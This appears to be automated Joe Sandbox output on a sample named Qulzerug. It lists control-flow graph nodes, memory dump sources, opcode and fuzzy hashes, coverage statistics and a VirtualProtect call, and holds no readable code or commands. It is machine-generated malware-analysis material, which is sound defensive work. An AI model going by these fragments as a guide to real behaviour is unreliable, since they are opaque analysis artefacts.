                        • String ID:
                        • API String ID:
                        • Opcode ID: 60ef6ee83103e28cdac69887330240c58e74bbac71640c2c4ad99a080f1ea986
                        • Instruction ID: d7f26c042312e0ce5dd92de6eb5feb39a87b5177cb714a952e95ada4154f7778
                        • Opcode Fuzzy Hash: 60ef6ee83103e28cdac69887330240c58e74bbac71640c2c4ad99a080f1ea986
                        • Instruction Fuzzy Hash: A3D19174A01218CFDB64DFA9D994B9DBBB2FF89300F1081A9D409AB365DB31A981CF50

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 863ef18-863ef2a 1 863ef54-863ef58 0->1 2 863ef2c-863ef4d 0->2 3 863ef64-863ef73 1->3 4 863ef5a-863ef5c 1->4 2->1 5 863ef75 3->5 6 863ef7f-863efab 3->6 4->3 5->6 10 863efb1-863efb7 6->10 11 863f1d8-863f21f 6->11 13 863f089-863f08d 10->13 14 863efbd-863efc3 10->14 42 863f221 11->42 43 863f235-863f241 11->43 15 863f0b0-863f0b9 13->15 16 863f08f-863f098 13->16 14->11 18 863efc9-863efd6 14->18 20 863f0bb-863f0db 15->20 21 863f0de-863f0e1 15->21 16->11 19 863f09e-863f0ae 16->19 22 863f068-863f071 18->22 23 863efdc-863efe5 18->23 25 863f0e4-863f0ea 19->25 20->21 21->25 22->11 27 863f077-863f083 22->27 23->11 24 863efeb-863f003 23->24 28 863f005 24->28 29 863f00f-863f021 24->29 25->11 31 863f0f0-863f103 25->31 27->13 27->14 28->29 29->22 37 863f023-863f029 29->37 31->11 33 863f109-863f119 31->33 33->11 36 863f11f-863f12c 33->36 36->11 39 863f132-863f147 36->39 40 863f035-863f03b 37->40 41 863f02b 37->41 39->11 49 863f14d-863f170 39->49 40->11 46 863f041-863f065 40->46 41->40 47 863f224-863f226 42->47 44 863f243 43->44 45 863f24d-863f269 43->45 44->45 50 863f26a-863f297 47->50 51 863f228-863f233 47->51 49->11 56 863f172-863f17d 49->56 61 863f299-863f29f 50->61 62 863f2af-863f2b3 call 863f330 50->62 51->43 51->47 58 863f17f-863f189 56->58 59 863f1ce-863f1d5 56->59 58->59 67 863f18b-863f1a1 58->67 64 863f2a3-863f2a5 61->64 65 863f2a1 61->65 66 863f2b9-863f2bd 62->66 64->62 65->62 68 863f308-863f318 66->68 69 863f2bf-863f2d6 66->69 73 863f1a3 67->73 74 863f1ad-863f1c6 67->74 69->68 77 863f2d8-863f2e2 69->77 73->74 74->59 80 863f2f5-863f305 77->80 81 863f2e4-863f2f3 77->81 81->80
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID: d
                        • API String ID: 0-2564639436
                        • Opcode ID: 23a9b3dc38789d440fdb2756f596d5bcf6e8141b87b755ddac64c244378ab171
                        • Instruction ID: b52f253bf97924fcb566899ab2658ce707628fea1aeaad47f5c75c9c6299dca0
                        • Opcode Fuzzy Hash: 23a9b3dc38789d440fdb2756f596d5bcf6e8141b87b755ddac64c244378ab171
                        • Instruction Fuzzy Hash: B6D18D34A00612CFCB14DF29D484A6AB7F2FF88311B66C95DE45A9B761DB71F842CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 86 293feb8-293ff39 VirtualProtect 89 293ff42-293ff67 86->89 90 293ff3b-293ff41 86->90 90->89
                        APIs
                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0293FF2C
                        Memory Dump Source
                        • Source File: 00000009.00000002.1505149371.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_2930000_Qulzerug.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 06373803d71328ce0f68e065e960eb1273cccc28969323f537f66acef33f815f
                        • Instruction ID: 34b8da70280aad732dcbc1a7be3739837ed19ecacab5cf0ca0bb73338bd38354
                        • Opcode Fuzzy Hash: 06373803d71328ce0f68e065e960eb1273cccc28969323f537f66acef33f815f
                        • Instruction Fuzzy Hash: 9F11E575D043099FDB20DFAAC844B9EFBF5EF48320F14842AD459A7250C7759945CFA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 106 863f460-863f488 108 863f4d6-863f4e4 106->108 109 863f48a-863f4d1 106->109 110 863f4f3 108->110 111 863f4e6-863f4f1 108->111 151 863f92d-863f934 109->151 112 863f4f5-863f4fc 110->112 111->112 115 863f502-863f506 112->115 116 863f5e5-863f5e9 112->116 117 863f935-863f95d 115->117 118 863f50c-863f510 115->118 120 863f5eb-863f5fa 116->120 121 863f63f-863f649 116->121 128 863f964-863f98e 117->128 122 863f522-863f580 118->122 123 863f512-863f51c 118->123 130 863f5fe-863f603 120->130 124 863f682-863f6a8 121->124 125 863f64b-863f65a 121->125 161 863f9f3-863fa1d 122->161 162 863f586-863f5e0 122->162 123->122 123->128 146 863f6b5 124->146 147 863f6aa-863f6b3 124->147 139 863f660-863f67d 125->139 140 863f996-863f9ac 125->140 128->140 134 863f605-863f63a call 863f330 130->134 135 863f5fc 130->135 134->151 135->130 139->151 164 863f9b4-863f9ec 140->164 153 863f6b7-863f6df 146->153 147->153 169 863f7b0-863f7b4 153->169 170 863f6e5-863f6fe 153->170 171 863fa27-863fa2d 161->171 172 863fa1f-863fa25 161->172 162->151 164->161 173 863f7b6-863f7cf 169->173 174 863f82e-863f838 169->174 170->169 190 863f704-863f713 170->190 172->171 179 863fa2e-863fa6b 172->179 173->174 196 863f7d1-863f7e0 173->196 176 863f895-863f89e 174->176 177 863f83a-863f844 174->177 181 863f8a0-863f8ce 176->181 182 863f8d6-863f923 176->182 191 863f846-863f848 177->191 192 863f84a-863f85c 177->192 181->182 200 863f92b 182->200 207 863f715-863f71b 190->207 208 863f72b-863f740 190->208 197 863f85e-863f860 191->197 192->197 213 863f7e2-863f7e8 196->213 214 863f7f8-863f803 196->214 204 863f862-863f866 197->204 205 863f88e-863f893 197->205 200->151 209 863f884-863f887 204->209 210 863f868-863f881 204->210 205->176 205->177 215 863f71f-863f721 207->215 216 863f71d 207->216 219 863f742-863f76e 208->219 220 863f774-863f77d 208->220 209->205 210->209 223 863f7ea 213->223 224 863f7ec-863f7ee 213->224 214->161 225 863f809-863f82c 214->225 215->208 216->208 219->164 219->220 220->161 222 863f783-863f7aa 220->222 222->169 222->190 223->214 224->214 225->174 225->196
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fa830794915a3a57087100f93644d576ebfcf17c13c3a29dee45320fd11a47fd
                        • Instruction ID: f1a6ecaa1947b3775a083c624d38de323af03ac1c43f05003b1da30dbaea384d
                        • Opcode Fuzzy Hash: fa830794915a3a57087100f93644d576ebfcf17c13c3a29dee45320fd11a47fd
                        • Instruction Fuzzy Hash: 67129C71A00215EFDB25EFA8C440AAEB7F2FF88311F10856DE4469B794DB35AD46CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 346 113d030-113d042 347 113d0d3-113d0da 346->347 348 113d048 346->348 349 113d04a-113d056 347->349 348->349 351 113d0df-113d0e4 349->351 352 113d05c-113d07e 349->352 351->352 353 113d080-113d09b 352->353 354 113d0e9-113d0fe 352->354 357 113d0a3-113d0b3 353->357 358 113d0b5-113d0bd 354->358 357->358 359 113d10b 357->359 360 113d100-113d109 358->360 361 113d0bf-113d0d0 358->361 360->361
                        Memory Dump Source
                        • Source File: 00000009.00000002.1504177014.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_113d000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 91398678d5817a857f37f52ed84d31bb52fd2410dbf03ca5a3fe8b4db27a1c92
                        • Instruction ID: 214c9cd36dbea7fefba1f9799880d110957cd52f613bd9c9f2e78f176a52ab5c
                        • Opcode Fuzzy Hash: 91398678d5817a857f37f52ed84d31bb52fd2410dbf03ca5a3fe8b4db27a1c92
                        • Instruction Fuzzy Hash: AA2125B1504244DFDF19DF54E9C0B2AFB65FBC4714F64C169E9090B24AC336D816CBA2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 424 863f330-863f352 425 863f3f9-863f405 424->425 426 863f358-863f374 424->426 428 863f3d1-863f3f6 426->428 429 863f376-863f38a call 863f460 426->429 428->425 433 863f390-863f3ad 429->433 433->428 435 863f3af-863f3c9 433->435 435->428
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98b21e0c2f37651609cf7e89ba4a3a18a194e37c06f6808430ef1889c5d99d42
                        • Instruction ID: ee46149f1a0a8ce8564d1442a2969e393cd1a8f19bb195993299ed67a8b5551a
                        • Opcode Fuzzy Hash: 98b21e0c2f37651609cf7e89ba4a3a18a194e37c06f6808430ef1889c5d99d42
                        • Instruction Fuzzy Hash: 8121D571A00219CFDB04DF98C581ADDB7F2EF89305F2141A9E405BB2A1DB76AD45CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 496 113d02b-113d042 497 113d0d3-113d0da 496->497 498 113d048 496->498 499 113d04a-113d056 497->499 498->499 501 113d0df-113d0e4 499->501 502 113d05c-113d07e 499->502 501->502 503 113d080-113d09b 502->503 504 113d0e9-113d0fe 502->504 507 113d0a3-113d0b3 503->507 508 113d0b5-113d0bd 504->508 507->508 509 113d10b 507->509 510 113d100-113d109 508->510 511 113d0bf-113d0d0 508->511 510->511
                        Memory Dump Source
                        • Source File: 00000009.00000002.1504177014.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_113d000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 633f671973706fbafc265e8a78a39be7cd23416c3fb565de0cfc706c6b37537b
                        • Instruction ID: 9ee67584166b29a6479b29fdec7276d52811dbdb481ad2c9414b22e25195fe58
                        • Opcode Fuzzy Hash: 633f671973706fbafc265e8a78a39be7cd23416c3fb565de0cfc706c6b37537b
                        • Instruction Fuzzy Hash: D611B176504280CFDB16CF54E9C0B16FF71FB84714F24C1AAD8490B65AC33AD41ACBA2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 513 863def8-863df19 514 863df20-863df76 513->514 515 863df1b 513->515 520 863df7d-863df85 514->520 515->514
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c97151b9c9c742e7868b6d898e4e171fc09ec5d1d10b333c8cfd1febc4cf4290
                        • Instruction ID: 9373cc6dd166a43062c345453c7a66ff272a94ddbf48d7eb29c9bf83f5f7e815
                        • Opcode Fuzzy Hash: c97151b9c9c742e7868b6d898e4e171fc09ec5d1d10b333c8cfd1febc4cf4290
                        • Instruction Fuzzy Hash: 0811B3B4E0021A9FDB44DFA9C9557AEBBF1BF88200F20856AD418B7354EA749A418B91
                        Memory Dump Source
                        • Source File: 00000009.00000002.1503961567.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_101d000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 82676697b54f79f09f2ef026ee93a693a7da37a1c63e60793b4116e5360fc6b7
                        • Instruction ID: a918607d95de888abbefd158d2ca410fc0cee9ab426ea3d4a3e5591206d2de8d
                        • Opcode Fuzzy Hash: 82676697b54f79f09f2ef026ee93a693a7da37a1c63e60793b4116e5360fc6b7
                        • Instruction Fuzzy Hash: 7201A7714057849BE7104F99DD88766FBD8FF41234F18C45AED890B28AD67D9840CB72
                        Memory Dump Source
                        • Source File: 00000009.00000002.1503961567.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_101d000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c46986072a0493acc8452b0830261f2f20a9849f383003242128f86bdd62e492
                        • Instruction ID: d3846a1e053dd7fdd050058fcb4d8381873b823215f49cd0cc08f47450afb556
                        • Opcode Fuzzy Hash: c46986072a0493acc8452b0830261f2f20a9849f383003242128f86bdd62e492
                        • Instruction Fuzzy Hash: 7AF0AF71405384AEE7208A09DC88B62FFD8EF41634F18C45AED880B686C2789844CB61
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3cd204addd6bc11381d817a8d23c50a0800ae6c36ed383f347d276c12c0b610
                        • Instruction ID: e8d68a9a3ae28aa15359bb81200416a82ab3552a63a4806c95c6baabee5d7c3d
                        • Opcode Fuzzy Hash: a3cd204addd6bc11381d817a8d23c50a0800ae6c36ed383f347d276c12c0b610
                        • Instruction Fuzzy Hash: EF013174A45518CFDB29DF58CD48B9AB3B5FB48301F0050D6E909A7758DB386E428F11
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c4dd85a779bba9306c8f4aa75c404676c3161a12d35578e36f79448ee882bea
                        • Instruction ID: be79494eb9d621247a0da323c3759eedb98b408f5fd3e428532e88a5462afa78
                        • Opcode Fuzzy Hash: 2c4dd85a779bba9306c8f4aa75c404676c3161a12d35578e36f79448ee882bea
                        • Instruction Fuzzy Hash: B401DA74A042298FCB65DF64D985A99B7F9FB48710F1050E9D40DAB348DB386F85CF01
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 86b38ca98b07895bc8d1ff2ed0b310dc10b2122107b4e5f2ddcc2a6eb72dfd39
                        • Instruction ID: 099211db09366ef8a4d21f6d9c162d76bfb92b366bc2407545cdebd29234a93b
                        • Opcode Fuzzy Hash: 86b38ca98b07895bc8d1ff2ed0b310dc10b2122107b4e5f2ddcc2a6eb72dfd39
                        • Instruction Fuzzy Hash: BEF01CB4E04248EFCB94DFA8D841AADBBF8AB49211F14C0AAE858E3341D6359A51DF50
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
                        • Instruction ID: 4219d6a715d41c8e7c36b6a4c5cc76b40f9e33d4fe897bf2e39ad2c4871abe63
                        • Opcode Fuzzy Hash: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
                        • Instruction Fuzzy Hash: FDE0ED74D04208EFCB94DFA8D94069CFBF4EB49311F10C0AAD858A3341D7759A51DF41
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
                        • Instruction ID: ff44ea3f3f6d119e7f633ea854522d5f1b6817b8b958c00066b157a6cfd46dba
                        • Opcode Fuzzy Hash: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
                        • Instruction Fuzzy Hash: 44E0ED74E04208EFCB94DFA8D940A9CFBF4EB58310F10C1AAD818A3341D635AA51DF41
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc4c8f9d6d0e2df62b93543acf087e5ce190a0062418b63b9e7ae74549cf92a0
                        • Instruction ID: 67ae35546f50e653be3a70da669bb9fea97ec0955433d551e90509f1f299bdd0
                        • Opcode Fuzzy Hash: fc4c8f9d6d0e2df62b93543acf087e5ce190a0062418b63b9e7ae74549cf92a0
                        • Instruction Fuzzy Hash: E1F0DA78608119CFDB59DF68C849ADAB3B5FB4C300F1050E9E519A7398DB38AE818F51
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
                        • Instruction ID: d43ca15d218048dd1901ee2c9db8deda00f3103ca772ea2fb813d2ded87949eb
                        • Opcode Fuzzy Hash: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
                        • Instruction Fuzzy Hash: 2EE0E574E04208EFCB94DFA8D545AACFBF4EB88300F10C0AAD819A3345D635AA52DF81
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
                        • Instruction ID: ca08fe0a4e953861da3044271b14f3c16922011f05abce8239e3a352b84c5597
                        • Opcode Fuzzy Hash: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
                        • Instruction Fuzzy Hash: 4BE0C974D04208EFCB94DFA8E54069DBBF4EB88311F10C0AAD918A3341D6759A51DF41
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87e33c8114aebaac26e69142f8b7622fd51e4f3ee9f93e6a5c8fcf5cc9e6dfd2
                        • Instruction ID: 0ac3cee1c5c09939245ca7da7c26a4ee5ad125d0d73a8bbae8c1d6a010561ac7
                        • Opcode Fuzzy Hash: 87e33c8114aebaac26e69142f8b7622fd51e4f3ee9f93e6a5c8fcf5cc9e6dfd2
                        • Instruction Fuzzy Hash: D2E08674908218EBC744DFA4E54096DBFB8AB85301F1090ADE84857341C6329A42DBA1
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07f7df55dfd12023940a0c4060d439fefdc2dbd7cea48408edc55e7c4370cd3b
                        • Instruction ID: 2cbf0f0de1f6e5de100bacf7744d83c46208e5632f4582e2d4a1d2bf910169b8
                        • Opcode Fuzzy Hash: 07f7df55dfd12023940a0c4060d439fefdc2dbd7cea48408edc55e7c4370cd3b
                        • Instruction Fuzzy Hash: C1E01A74D04208EBCB54DF98D5406ACBBB4AF88201F1080EAC81863345DA355A42DF45
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 858fa55789cbdf40ed351e802139fba7dfced51c8fa5d6d127c0b9c808192639
                        • Instruction ID: b3e1c8917bffe9e3302c18666084d159de0c2f3f6928ad1d3f1010edc9ec1594
                        • Opcode Fuzzy Hash: 858fa55789cbdf40ed351e802139fba7dfced51c8fa5d6d127c0b9c808192639
                        • Instruction Fuzzy Hash: 49E01274909218DBCB54DF94E5416ACBFB8EB85305F1091EEE80827345DA316E42DB81
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e25e67364c3b2713b6cb1a1588e2e9c42908fe2427ab22b7f69a8ae500466e7e
                        • Instruction ID: 3f0d0cf9ea58703463258952491dda4e527fdbd120af37c0b0c3632fc2a45607
                        • Opcode Fuzzy Hash: e25e67364c3b2713b6cb1a1588e2e9c42908fe2427ab22b7f69a8ae500466e7e
                        • Instruction Fuzzy Hash: E7C02B7004E314C3C1E51F44700C33033FDC783203F053820E40C00261C66C20C0D342

                        Execution Graph

                        Execution Coverage:2.6%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        execution_graph 14748 c0feb8 14749 c0ff00 VirtualProtect 14748->14749 14751 c0ff3b 14749->14751

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 236 809da70-809da98 237 809da9a 236->237 238 809da9f-809dae1 236->238 237->238 239 809db68-809db6f 238->239 240 809dae7-809db62 call 809def8 238->240 241 809dd18-809dd63 239->241 242 809db75-809dbfa 239->242 240->239 252 809ddb8-809de7f 241->252 253 809dd65-809dd7e 241->253 265 809dc00-809dc7c 242->265 266 809dd12 242->266 269 809de9e-809dea4 252->269 253->252 260 809dd80-809ddb3 253->260 260->269 282 809dcdb-809dce4 265->282 266->241 270 809deae 269->270 271 809dea6 269->271 271->270 284 809dc7e-809dc87 282->284 285 809dce6-809dcea 282->285 286 809dc89 284->286 287 809dc8e-809dcc6 284->287 285->266 288 809dcec-809dd07 285->288 286->287 294 809dcd8 287->294 295 809dcc8-809dcd6 287->295 288->266 294->282 295->285
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53ddad44cc54540c937eaf4ba7f2031ceeca479f8951f54beddb4adf4a688a23
                        • Instruction ID: 6b7a431c6b061557d0416d18268a45a2fc39a075cffa49b0468f4658a4e95e75
                        • Opcode Fuzzy Hash: 53ddad44cc54540c937eaf4ba7f2031ceeca479f8951f54beddb4adf4a688a23
                        • Instruction Fuzzy Hash: 67D1A174E41218CFDB54DFA9D990A9DBBB2FF89300F2081A9D409AB365DB31AD85CF50

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 809ef18-809ef2a 1 809ef2c-809ef4d 0->1 2 809ef54-809ef58 0->2 1->2 3 809ef5a-809ef5c 2->3 4 809ef64-809ef73 2->4 3->4 6 809ef7f-809efab 4->6 7 809ef75 4->7 10 809f1d8-809f21f 6->10 11 809efb1-809efb7 6->11 7->6 45 809f221 10->45 46 809f235-809f241 10->46 12 809f089-809f08d 11->12 13 809efbd-809efc3 11->13 16 809f08f-809f098 12->16 17 809f0b0-809f0b9 12->17 13->10 15 809efc9-809efd6 13->15 19 809f068-809f071 15->19 20 809efdc-809efe5 15->20 16->10 21 809f09e-809f0ae 16->21 22 809f0bb-809f0db 17->22 23 809f0de-809f0e1 17->23 19->10 25 809f077-809f083 19->25 20->10 26 809efeb-809f003 20->26 24 809f0e4-809f0ea 21->24 22->23 23->24 24->10 28 809f0f0-809f103 24->28 25->12 25->13 29 809f00f-809f021 26->29 30 809f005 26->30 28->10 33 809f109-809f119 28->33 29->19 39 809f023-809f029 29->39 30->29 33->10 34 809f11f-809f12c 33->34 34->10 38 809f132-809f147 34->38 38->10 47 809f14d-809f170 38->47 40 809f02b 39->40 41 809f035-809f03b 39->41 40->41 41->10 42 809f041-809f065 41->42 49 809f224-809f226 45->49 50 809f24d-809f269 46->50 51 809f243 46->51 47->10 55 809f172-809f17d 47->55 52 809f228-809f233 49->52 53 809f26a-809f297 49->53 51->50 52->46 52->49 63 809f299-809f29f 53->63 64 809f2af-809f2b3 call 809f330 53->64 58 809f17f-809f189 55->58 59 809f1ce-809f1d5 55->59 58->59 65 809f18b-809f1a1 58->65 66 809f2a1 63->66 67 809f2a3-809f2a5 63->67 69 809f2b9-809f2bd 64->69 70 809f1ad-809f1c6 65->70 71 809f1a3 65->71 66->64 67->64 72 809f308-809f318 69->72 73 809f2bf-809f2d6 69->73 70->59 71->70 73->72 79 809f2d8-809f2e2 73->79 81 809f2f5-809f305 79->81 82 809f2e4-809f2f3 79->82 82->81
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID: d
                        • API String ID: 0-2564639436
                        • Opcode ID: b65b97582982b8e9da7c67fd0f02e8bb42c37bc1e1800c4e0658f4e0f04b4410
                        • Instruction ID: 4312afcb43e1472081113889f4aaff6173d8212f9c5cda62b428e24e4ff619b0
                        • Opcode Fuzzy Hash: b65b97582982b8e9da7c67fd0f02e8bb42c37bc1e1800c4e0658f4e0f04b4410
                        • Instruction Fuzzy Hash: 03D14934600602CFCB24DF69C484A6AB7F3FF89311B158669D49ADB7A1DB31F856CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 87 c0feb8-c0ff39 VirtualProtect 90 c0ff42-c0ff67 87->90 91 c0ff3b-c0ff41 87->91 91->90
                        APIs
                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C0FF2C
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1519015333.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_c00000_Qulzerug.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: c4a328eed99e9d6faed7eeecd280e9f6158f6020dad668af25b2a5a2692dd87a
                        • Instruction ID: 1b35d62c3a0a3ff8479f4fcb5954cb1a0f52cf4c8107a0fa14e2605227b60f71
                        • Opcode Fuzzy Hash: c4a328eed99e9d6faed7eeecd280e9f6158f6020dad668af25b2a5a2692dd87a
                        • Instruction Fuzzy Hash: 701115B1D043098FDB20DFAAC480B9EFBF5EF48310F148429D419A7240C775A941CFA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
